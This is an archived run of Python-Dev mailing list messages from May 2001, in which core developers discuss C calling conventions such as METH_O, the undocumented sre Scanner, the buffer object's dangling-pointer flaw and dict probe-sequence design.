Message-ID: <3B0F7D44.1A12CE0F@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > I was thinking of using pointer indirection for this:
> >
> >       foo(PyObject *self, int *i)
> >
> > If i is given as argument, *i is set to the value, otherwise
> > i is set to NULL.
> 
> That is a good idea; I'll try to update my patch to support more
> calling conventions.

This morning another idea popped up which could help us with
handling generic calling schemes:

	How about making *all* parameters pointers ?!

The calling mechanism would then just have to deal with a
varying number of parameters and not with different types
(this is how PyArg_ParseTuple() works too if I remember correctly).

We could easily provide calling schemes for 1 - n arguments
that way and the types of these arguments would be defined
by the parser string just like before.

Examples:

	foo(PyObject *self, PyObject *obj, int *i)
	bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these
to:

	foo(void *, void *, void *)
	bar(void *, void *, void *, void *, void *)

Wouldn't this work ?



From paulp at ActiveState.com  Sat May 26 17:02:08 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Sat, 26 May 2001 08:02:08 -0700
Subject: [Python-Dev] Scanner
Message-ID: <3B0FC570.17707787@ActiveState.com>

Whatever happened to the sre Scanner? It seemed like a good idea but it
was not documented and it doesn't work for me. Is it just a case of
nobody got around to the documentation or have we decided against it?

Here's the code that doesn't work for me:

from sre import Scanner

scanner = Scanner([
    (r"[a-zA-Z_]\w*", None),
    (r"\d+\.\d*", None),
    (r"\d+", None),
    (r"=|\+|-|\*|/", None),
    (r"\s+", None),
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

Traceback (most recent call last):
  File "junk.py", line 11, in ?
    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
  File "c:\program files\python21\lib\sre.py", line 254, in scan
    action = self.lexicon[m.lastindex][1]
TypeError: sequence index must be integer

m.lastindex is None
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mal at lemburg.com  Sat May 26 17:47:47 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 17:47:47 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <3B0FD023.C4588919@lemburg.com>

Tim Peters wrote:
> 
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?  "The
> bug" has been known for years without any action taken to address it; the
> docs give up in spots and nobody addresses that either (like "The current
> policy seems to state that these characters may be multi-byte characters" --
> well, yes or no?); the builtin buffer() function isn't called anywhere in
> the std test suite; the file object still has an undocumented readinto()
> method that just confuses people who bump into it; and it's so obscure in
> daily life that it appears Guido didn't even think of it when adding
> iterators for the other sequence types.
> 
> I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
> champion it now?  That would be cool.

I believe that nobody really likes the buffer interface enough to
let the world know about it, except maybe Greg ;-)

Even the idea of replacing the usage of strings as data buffers
with buffer objects didn't get very far; common habits are simply
hard to break.

> About combining strop and buffers and strings, don't forget unicodeobject.c:
> that's got oodles of basically duplicate code too.  /F suggested dealing
> with the minor differences via maintaining one code file that gets compiled
> multiple times w/ appropriate #defines.

Hmm, that only saves us a few kB in source, but certainly not
in the object files. 

The better idea would be making the types subclass from a generic 
abstract string object -- I just don't know how this will be 
possible with Guido's type patches. We'll just have to wait, 
I guess.



From tim.one at home.com  Sat May 26 23:15:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 17:15:11 -0400
Subject: [Python-Dev] Scanner
In-Reply-To: <3B0FC570.17707787@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKJKEAA.tim.one@home.com>

[Paul Prescod]
> Whatever happened to the sre Scanner? It seemed like a good idea
> but it was not documented

I previously urged /F to document, and Python-Dev to accept, the .lastindex
and .lastgroup match object extensions, but to date <wink> got no response.
Whether to adopt the Scanner class too is fuzzier, since AFAICT almost
nobody has figured out how to use it.

> and it doesn't work for me.

This isn't a code problem, it's a failure to reverse-engineer the
undocumented API <wink>.

> Is it just a case of nobody got around to the documentation or have
> we decided against it?

WRT Scanner, partly the former, nothing of the latter, mostly that there's
been no discussion of the API at all.

WRT lastindex and lastgroup, I think purely the former.

> Here's the code that doesn't work for me:
>
> from sre import Scanner
>
> scanner = Scanner([
>     (r"[a-zA-Z_]\w*", None),
>     (r"\d+\.\d*", None),
>     (r"\d+", None),
>     (r"=|\+|-|\*|/", None),
>     (r"\s+", None),
>     ])

1. Every tokenization regexp must contain exactly one capturing group.
   The missing groups in the patterns above are the source of your later
   TypeError.  It's unclear to me whether that was the intent, or just the
   way the code happens to work today.

2. When an action is None, the substring matched by the pattern will
   be thrown away.  You need to supply non-None actions if you want
   anything to show up in the token list.

> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>
> Traceback (most recent call last):
>   File "junk.py", line 11, in ?
>     tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>   File "c:\program files\python21\lib\sre.py", line 254, in scan
>     action = self.lexicon[m.lastindex][1]
> TypeError: sequence index must be integer
>
> m.lastindex is None

Here's a working rewrite:

from sre import Scanner

def retrieve(scanner, group):
    return group

scanner = Scanner([
    (r"([a-zA-Z_]\w*)", retrieve),
    (r"(\d+\.\d*)", retrieve),
    (r"(\d+)", retrieve),
    (r"(=|\+|-|\*|/)", retrieve),
    (r"(\s+)", None),  # ignore whitespace
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
print tokens, `tail`

That prints

['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''
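
For readers wondering why the missing group surfaces as `m.lastindex is None`,
here is a minimal sketch of a Scanner-style tokenizer built on the standard
`re` module. It is a hypothetical re-implementation for illustration, not
sre's code: `make_scanner` is an invented name, the patterns are joined into
one alternation so that capturing group k identifies lexicon entry k - 1, and
actions receive only the matched text rather than `(scanner, text)`.

```python
import re


def make_scanner(lexicon):
    """Hypothetical Scanner-like tokenizer (illustration only).

    Each pattern in `lexicon` is assumed to contain exactly one capturing
    group, so in the combined alternation group k belongs to entry k - 1.
    """
    combined = re.compile("|".join(pattern for pattern, _ in lexicon))

    def scan(text):
        tokens = []
        pos = 0
        while pos < len(text):
            m = combined.match(text, pos)
            if m is None or m.end() == pos:
                break  # no progress: stop and report the unscanned tail
            if m.lastindex is None:
                # The alternative that matched had no capturing group,
                # the same situation as in the traceback above.
                raise TypeError("lexicon pattern lacks a capturing group")
            action = lexicon[m.lastindex - 1][1]
            if action is not None:  # None means "discard this match"
                tokens.append(action(m.group(m.lastindex)))
            pos = m.end()
        return tokens, text[pos:]

    return scan


def identity(text):
    return text


scan = make_scanner([
    (r"([a-zA-Z_]\w*)", identity),
    (r"(\d+\.\d*)", identity),
    (r"(\d+)", identity),
    (r"(=|\+|-|\*|/)", identity),
    (r"(\s+)", None),  # ignore whitespace
])
tokens, tail = scan("sum = 3*foo + 312.50 + bar")
print(tokens, repr(tail))
```

Fed the grouped lexicon, this yields the same token list as the sre version
and an empty tail; fed the original ungrouped patterns, the first match has
no capturing group and the sketch raises TypeError.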


In return for that, how about *you* supply a works-on-Windows rewrite of
test_urllib2.py?  You know more about that than anyone, and the test has
been failing for weeks.


From MarkH at ActiveState.com  Sun May 27 04:39:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Sun, 27 May 2001 12:39:43 +1000
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>

[Tim]
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?

My take is a little different.  I think people could be convinced to care
about it, and indeed I do.  However, it has one fatal flaw, and no one seems
to know what to do about it.

The problem is the one best demonstrated with the array module - if you get
a pointer to the buffer interface for an array object, but the array then
resizes itself, the buffer pointer dangles.
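
A pure-Python analogy of the hazard, under loudly stated assumptions:
`GrowableArray` and `CachingBuffer` are hypothetical classes, a list stands in
for the raw memory block, and growing the array copies into a new block the
way `realloc()` may move data.  The buffer caches the block once, so after a
resize it keeps reading the abandoned copy.  In C that stale pointer can crash
the interpreter; here it only returns stale data.

```python
class GrowableArray:
    """Hypothetical array whose storage block may move when it grows."""

    def __init__(self, items):
        self.block = list(items)

    def append(self, item):
        # Model realloc() moving the data: copy into a brand-new block.
        self.block = self.block + [item]

    def get_buffer(self):
        # Analogue of the buffer interface handing out a raw pointer.
        return self.block


class CachingBuffer:
    """Hypothetical buffer object that fetches the pointer only once."""

    def __init__(self, obj):
        self.obj = obj               # keeps the object alive...
        self.ptr = obj.get_buffer()  # ...but remembers the old block

    def __getitem__(self, i):
        return self.ptr[i]

    def __len__(self):
        return len(self.ptr)


arr = GrowableArray([1, 2, 3])
buf = CachingBuffer(arr)
arr.append(4)
arr.block[0] = 99
print(len(buf), buf[0])  # prints 3 1: still reading the abandoned block
```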

There have been a few attempts over time to raise the buffer profile, but
this design flaw leaves people scratching their head - it is hard to press
for adoption of a feature that has a known crash hiding away.

However, addressing this problem is difficult.  Guido appears unconvinced
that buffer objects and interfaces are that worthwhile.  It appears no one
else knows how to proceed in the face of this ambivalence - that describes
my take even if no one else's.

The-buffer-is-dead,-long-live-the-buffer ly,

Mark.


From tim.one at home.com  Sun May 27 08:34:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 02:34:53 -0400
Subject: [Python-Dev] Next dict crusade
Message-ID: <LNBBLJKPBEHFEDALKOLCKELEKEAA.tim.one@home.com>

I'm still trying to work off the backlog of ignored dict ideas.  Way back
here:

    http://mail.python.org/pipermail/python-dev/2000-December/011085.html

Christian Tismer suggested using polynomial division instead of
multiplication for generating the probe sequence, as a way to get all the
bits of the hash code into play.  The desirability of doing that is
illustrated by, e.g., this program:

def f(keys):
    from time import clock

    d = {}

    s = clock()
    for k in keys:
        d[k] = k
    f = clock()
    print "build time %.3f" % (f-s)

    s = clock()
    for k in keys:
        assert d.has_key(k)
    f = clock()
    print "search time %.3f" % (f-s)

# Excellent performance.
keys = range(20000)
for i in range(5):
    f(keys)

# Terrible performance; > 500x slower.
keys = [i << 16 for i in range(20000)]
for i in range(5):
    f(keys)
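
A quick way to see why the second key set is so slow, assuming CPython's
behaviour that `hash(n) == n` for small non-negative ints and assuming a
2**15-slot table (large enough for 20000 keys; the size is chosen only for
illustration).  The first probe slot comes from the low bits of the hash, and
every `i << 16` has its low 16 bits clear.  The masked increment uses the
`hash ^ (hash >> 3)` formula that appears later in this message.

```python
MASK = 2**15 - 1  # assumed table of 32768 slots, enough for 20000 keys


def first_slots(keys):
    """Distinct starting slots: the low bits of each key's hash."""
    return {hash(k) & MASK for k in keys}


def masked_increments(keys):
    """Distinct probe increments when the increment is masked."""
    return {(hash(k) ^ (hash(k) >> 3)) & MASK for k in keys}


good = range(20000)
bad = [i << 16 for i in range(20000)]

print(len(first_slots(good)), len(first_slots(bad)))  # 20000 vs. 1
print(len(masked_increments(bad)))                    # only 4 increments
```

Every key in the bad set starts at slot 0 and can only step by one of four
increments, so later insertions and lookups walk long collision chains.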

Christian had a very clever (cheap and effective) solution:

    Old algorithm (multiplication):
        shift the index left by 1
        if index > mask:
            xor the index with the generator polynomial

    New algorithm (division):
       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

where "index" should really read "increment", and unlike today we do not
mask off any of the bits of the initial increment (and that's what lets
*all* the bits of the hash code come into play; there's no point to doing
this otherwise).
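
The two update rules translate directly into Python.  In this sketch the
function names are made up and the constants are assumptions matching the
example used below: polynomial 131 (x**7 + x + 1) with mask 127, i.e. a
128-slot table.  Treating the increment as a polynomial over GF(2), the old
rule multiplies by x and the new rule divides by x; since 131 is primitive,
either rule started from a nonzero value below 128 cycles through all 127
nonzero values.

```python
POLY = 131  # x**7 + x + 1, assumed generator for a 128-slot table
MASK = 127


def step_multiply(incr, mask=MASK, poly=POLY):
    """Old rule: shift left; if the result overflows the mask, reduce."""
    incr <<= 1
    if incr > mask:
        incr ^= poly
    return incr


def step_divide(incr, poly=POLY):
    """New rule: if the low bit is set, add the polynomial; shift right."""
    if incr & 1:
        incr ^= poly
    return incr >> 1


def orbit(step, start):
    """Values visited by repeatedly applying `step` until one repeats."""
    seen = []
    incr = start
    while incr not in seen:
        seen.append(incr)
        incr = step(incr)
    return seen


print(len(orbit(step_multiply, 1)), len(orbit(step_divide, 1)))  # 127 127
```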

I've since discovered that it's got a fatal rare flaw:  the new algorithm
can generate a 0 increment, while the old algorithm cannot.

Example:  poly is 131 and hash is 145.  Because we don't mask off any bits
in computing the initial increment, the initial increment is computed as

    incr = hash ^ (hash >> 3) ==
           145 ^ (145 >> 3) ==
           145 ^ 18 ==
           131 ==
           poly

So if we don't hit on the first probe, the new

       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

business sets incr to 0, and the result is an infinite loop (0 is a fixed
point).  I hate to add another branch to this.  As is, the existing branch
in both the old and new ways is of the worst possible kind:  it's taken half
the time, with a pseudo-random distribution.  So there's not a
branch-prediction gimmick on earth it won't fool.
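
The fixed point can be checked in a few lines.  This sketch assumes the
unmasked initial increment `hash ^ (hash >> 3)` described above and defines
the division rule as a hypothetical `step_divide` helper so the snippet
stands alone.

```python
POLY = 131


def step_divide(incr, poly=POLY):
    """Division rule: if the low bit is set, add the polynomial; shift right."""
    if incr & 1:
        incr ^= poly
    return incr >> 1


h = 145
incr = h ^ (h >> 3)     # unmasked initial increment
print(incr)             # 131, i.e. equal to POLY
incr = step_divide(incr)
print(incr)             # 0
print(step_divide(0))   # 0 again: a fixed point, so probing never moves

# Conversely, a nonzero increment already below POLY stays nonzero and
# below POLY, so 0 can only arise from larger starting values.
assert all(0 < step_divide(v) < POLY for v in range(1, POLY))
```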

Note that there's no reasonable way to identify "bad values" for incr before
the loop starts, either -- there's really no way to tell whether incr mod
poly is 0 without a loop to do division steps until incr < poly (if incr <
poly and incr != 0, incr can never become 0, so there's no more need to test
after reaching that point).  Such a "pre loop" would cost more than the
existing loop in most cases, as we usually get out of the existing loop
today on its first iteration.

But in that case, what am I worried about <wink>?

time-for-a-checkin-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Sun May 27 11:01:14 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 27 May 2001 11:01:14 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com>
Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>

> To call these, the calling mechanism would have to cast these
> to:
> 
> 	foo(void *, void *, void *)
> 	bar(void *, void *, void *, void *, void *)
> 
> Wouldn't this work ?

I think it would work, but I doubt it would save much compared to the
existing approach. The main point of this patch is to improve
efficiency, and (according to Jeremy's analysis), most of the time for
calling a function is spent in PyArg_ParseTuple. So if we replace it
with another interface that also relies on parsing a string, I doubt
we'll improve efficiency.

IOW, I won't implement that approach. If you do, I'd be curious to
hear the results, of course.

Regards,
Martin

P.S. There would be still cases where PyArg_ParseTuple is needed,
e.g. for "O!".


From mal at lemburg.com  Sun May 27 12:26:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:26:27 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <3B10D653.4D81E280@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > To call these, the calling mechanism would have to cast these
> > to:
> >
> >       foo(void *, void *, void *)
> >       bar(void *, void *, void *, void *, void *)
> >
> > Wouldn't this work ?
> 
> I think it would work, but I doubt it would save much compared to the
> existing approach. The main point of this patch is to improve
> efficiency, and (according to Jeremy's analysis), most of the time for
> calling a function is spent in PyArg_ParseTuple. So if we replace it
> with another interface that also relies on parsing a string, I doubt
> we'll improve efficiency.

That's the point: we are not replacing PyArg_ParseTuple()
with another parsing mechanism, we are only using PyArg_ParseTuple()
as fallback solution for parser strings for which we don't
provide a special case implementation.

The idea is to simply do a strcmp() (*) for a few common
combinations (like e.g. "O" and "OO") and then provide the
same special case handling like you do with e.g. METH_O.
The result would be almost the same w/r to performance
and code reduction as with your approach. The only addition
would be using strcmp() instead of a switch statement.

The advantage of this approach is that while you can still
provide special case handling of common parser strings, you
can also provide generic APIs for most other parser strings
by reverting to PyArg_ParseTuple() for these.
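
The scheme can be modelled in Python, with a dictionary lookup playing the
part of the `strcmp()` checks.  All names here are hypothetical:
`parse_generic` is a toy stand-in for `PyArg_ParseTuple` that knows only the
"O" and "i" codes, and `FAST_ARITY` lists the formats assumed to get
special-case handling.

```python
from collections import Counter

# Formats assumed to get hand-written fast paths (hypothetical table).
FAST_ARITY = {"O": 1, "OO": 2}
calls = Counter()  # counts which path each call took


def parse_generic(fmt, args):
    """Toy stand-in for PyArg_ParseTuple: understands only 'O' and 'i'."""
    codes, _, name = fmt.partition(":")
    name = name or "function"
    if len(args) != len(codes):
        raise TypeError("%s() takes exactly %d argument(s) (%d given)"
                        % (name, len(codes), len(args)))
    for code, arg in zip(codes, args):
        if code not in "Oi":
            raise ValueError("unsupported format code %r" % code)
        if code == "i" and not isinstance(arg, int):
            raise TypeError("%s() expected an integer" % name)
    return tuple(args)


def parse_args(fmt, args):
    """Try a fast path first; fall back to the generic parser."""
    codes = fmt.partition(":")[0]
    arity = FAST_ARITY.get(codes)  # stands in for strcmp(fmt, "O") etc.
    if arity is not None and len(args) == arity:
        calls["fast"] += 1
        return tuple(args)
    calls["generic"] += 1
    return parse_generic(fmt, args)  # also builds the error messages


parse_args("O:len", ["abc"])
parse_args("OO:cmp", [1, 2])
parse_args("Oi:foo", ["x", 3])
print(dict(calls))
```

Calls whose format matches a fast-path entry skip the generic parser
entirely; anything else, including a wrong argument count, falls back to it.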

> IOW, I won't implement that approach. If you do, I'd be curious to
> hear the results, of course.

I'll see what I can do...

> P.S. There would be still cases where PyArg_ParseTuple is needed,
> e.g. for "O!".

True... can't win 'em all ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 27 12:30:48 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:30:48 +0200
Subject: [Python-Dev] strop vs. string
References: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <3B10D758.3741AC2F@lemburg.com>

Mark Hammond wrote:
> 
> [Tim]
> > The buffer object has been neglected for years:  is that because it's in
> > prime shape, or because nobody cares about it enough to maintain it?
> 
> My take is a little different.  I think people could be convinced to care
> about it, and indeed I do.  However, it has one fatal flaw, and no one seems
> to know what to do about it.
> 
> The problem is the one best demonstrated with the array module - if you get
> a pointer to the buffer interface for an array object, but the array then
> resizes itself, the buffer pointer dangles.

I guess there are three ways to "solve" this:

a) mutable types don't implement the getreadbuf interface

b) the getreadbuf interface is complemented with a callback
   interface, so the buffer object can be notified of
   the change

c) calling getreadbuf on a mutable object causes this object
   to become immutable
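
Option (b) might look roughly like this Python model.  It is a sketch under
stated assumptions: `NotifyingArray`, `NotifiedBuffer`, and `storage_moved`
are hypothetical names, a list stands in for raw memory, and the exporting
object keeps a list of every buffer it has handed its block to, calling each
one back when the block moves.

```python
class NotifyingArray:
    """Hypothetical mutable object implementing option (b)."""

    def __init__(self, items):
        self.block = list(items)
        self.exported = []  # every buffer that holds our "pointer"

    def get_buffer(self, buf):
        self.exported.append(buf)  # remember who must be told later
        return self.block

    def append(self, item):
        self.block = self.block + [item]  # storage moves, as with realloc()
        for buf in self.exported:
            buf.storage_moved(self.block)


class NotifiedBuffer:
    """Hypothetical buffer that accepts pointer updates from its object."""

    def __init__(self, obj):
        self.obj = obj
        self.ptr = obj.get_buffer(self)

    def storage_moved(self, new_ptr):
        self.ptr = new_ptr

    def __getitem__(self, i):
        return self.ptr[i]

    def __len__(self):
        return len(self.ptr)


arr = NotifyingArray([1, 2, 3])
b1, b2 = NotifiedBuffer(arr), NotifiedBuffer(arr)
arr.append(4)
print(len(b1), len(b2), b1[3])  # prints 4 4 4
```

Each resize costs one callback per outstanding buffer, and the list never
shrinks in this sketch; a real design would likely need weak references or an
explicit release call.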

-- 
Marc-Andre Lemburg


From jeremy at digicool.com  Sun May 27 20:51:26 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:51:26 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <15121.19630.329909.482775@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  MvL> to the existing approach. The main point of this patch is to
  MvL> improve efficiency, and (according to Jeremy's analysis), most
  MvL> of the time for calling a function is spent in
  MvL> PyArg_ParseTuple.

I'd like to qualify this a bit.  What I reported earlier is that the
BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in
PyArg_ParseTuple().  This strikes me as excessive, because it's a
static property of the code.  (One could imagine writing a Python
script that parsed the "O!|is#" format strings and generated
efficient, specialized C code for that format.)

If we benchmark other programs, particularly those that do more work
in the builtins, the relative cost of the argument processing will be
lower.

Jeremy


From jeremy at digicool.com  Sun May 27 20:55:36 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:55:36 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
Message-ID: <15121.19880.775931.946049@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

  TP> Do METH_O, convert every "O" function to use it, declare
  TP> victory, and enjoy the weekend <wink>.

  TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
  TP>     size-ly y'rs - tim

How is METH_O different than METH_OLDARGS?  

The old-style argument passing is definitely the most efficient for
functions of zero or one arguments.  There's special-case code in
ceval to support these cases -- fast_cfunction() -- primarily
because in these cases the function can be invoked by using arguments
directly from the Python stack instead of copying them to a tuple
first.

Jeremy


From tim.one at home.com  Sun May 27 22:37:43 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:37:43 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>

[Jeremy]
> How is METH_O different than METH_OLDARGS?

I have no idea:  can you explain it?  The #define's for these symbols are
uncommented, and it's a mystery to me what they're *supposed* to mean.

> The old-style argument passing is definitely the most efficient for
> functions of zero or one arguments.  There's special-case code in
> ceval to support these cases -- fast_cfunction() -- primarily
> because in these cases the function can be invoked by using arguments
> directly from the Python stack instead of copying them to a tuple
> first.

OK, I'm looking in bltinmodule.c, at builtin_len.  It starts like so:

static PyObject *
builtin_len(PyObject *self, PyObject *args)
{
	PyObject *v;
	long res;

	if (!PyArg_ParseTuple(args, "O:len", &v))
		return NULL;

So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
table is:

	{"len",		builtin_len, 1, len_doc},

That is, it says nothing about the calling convention.  Since C fills in a 0
for missing values, and methodobject.c has

/* Flag passed to newmethodobject */
#define METH_OLDARGS  0x0000
#define METH_VARARGS  0x0001
#define METH_KEYWORDS 0x0002

then doesn't the struct for builtin_len implicitly specify METH_OLDARGS?  But
if that's true, and fast_cfunction() does not create a tuple in this case,
how is it that builtin_len gets a tuple?

Something doesn't add up here.  Or does it?  There's no *reference* to
METH_OLDARGS anywhere in the code base other than its definition and its use
in method tables, so whatever code *keys* off it must be assuming a
hardcoded 0 value for it -- or indeed nothing keys off it at all.

I expect this line in ceval.c is doing the dirty assumption:

			    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead.

But I see that builtin_len is falling into the METH_VARARGS case despite
that it wasn't declared that way and that it sure looks like METH_OLDARGS
(0) is the default.  Confusing!  Fix it <wink>.


From tim.one at home.com  Sun May 27 22:46:29 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:46:29 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>

[Tim, thrashing]
> ...
> So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
> table is:
>
> 	{"len",		builtin_len, 1, len_doc},
>
> That is, it says nothing about the calling convention.

Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define.  So
that explains that.

Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is there
some advantage to using METH_VARARGS in this case?  This gets back to what
these #defines are intended to *mean*, and I still haven't figured that out.


From mwh at python.net  Sun May 27 23:32:48 2001
From: mwh at python.net (Michael Hudson)
Date: Sun, 27 May 2001 22:32:48 +0100 (BST)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>
Message-ID: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>

On Sun, 27 May 2001, Tim Peters wrote:

> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

So you can't do

>>> len(1,2)
2

a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

My impression is that generally METH_VARARGS is saner than METH_OLDARGS
(ie. more consistent).  It seems the proposed METH_O is basically
METH_OLDARGS + the restriction that there is in fact only one argument, so
we save a tuple allocation over METH_VARARGS, but get argument count
checking over METH_OLDARGS.

Cheers,
M.


From tim.one at home.com  Mon May 28 00:49:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 18:49:38 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>

[Tim]
> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

[Michael Hudson]
> So you can't do
>
> >>> len(1,2)
> 2
>
> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

If I didn't know better, I'd suspect Python's internal calling conventions
at the start didn't perfectly anticipate all future developments.  Among
other things, looks like it's impossible for a METH_OLDARGS function to
distinguish between being called with more than one argument and being
called with a single tuple argument.
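
A small Python model of the conventions as described in this thread makes the
ambiguity concrete.  It is a sketch, not the C implementation: `call_builtin`
and the string flag values are stand-ins, `None` plays the role of a NULL
argument, and `args` is the tuple of positional arguments the caller actually
supplied.

```python
METH_OLDARGS, METH_VARARGS, METH_O = "oldargs", "varargs", "o"  # stand-ins


def call_builtin(func, flags, args, name="func"):
    """Model how a C function receives its arguments under each flag."""
    if flags == METH_VARARGS:
        return func(args)               # always the whole tuple
    if flags == METH_OLDARGS:
        if len(args) == 0:
            return func(None)           # NULL
        if len(args) == 1:
            return func(args[0])        # the bare object
        return func(args)               # several args packed into a tuple
    if flags == METH_O:
        if len(args) != 1:              # checked before func is called
            raise TypeError("%s() takes exactly 1 argument (%d given)"
                            % (name, len(args)))
        return func(args[0])
    raise ValueError("unknown flags %r" % (flags,))


def show(arg):
    return arg


print(call_builtin(show, METH_OLDARGS, (1, 2)))     # f(1, 2)
print(call_builtin(show, METH_OLDARGS, ((1, 2),)))  # f((1, 2)): same result
```

Under METH_OLDARGS both calls deliver the same tuple to the callee.  Under the
METH_O model the two-argument call is rejected before the function runs,
while the single-tuple call passes the tuple through unchanged.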

> My impression is that generally METH_VARARGS is saner than METH_OLDARGS
> (ie. more consistent).

Yes, METH_OLDARGS does appear to, well, suck.

> It seems the proposed METH_O is basically METH_OLDARGS + the
> restriction that there is in fact only one argument, so we save
> a tuple allocation over METH_VARARGS,

Also, and more importantly, save the PyArg_ParseTuple call on the receiving
end.

> but get argument count checking over METH_OLDARGS.

Which is worth getting.  I'm back to where I started here:

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


PS:  But today I'll add another:  add at least one comment to the code --
this stuff is a bitch to reverse-engineer.


From thomas at xs4all.net  Mon May 28 00:50:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:50:58 +0200
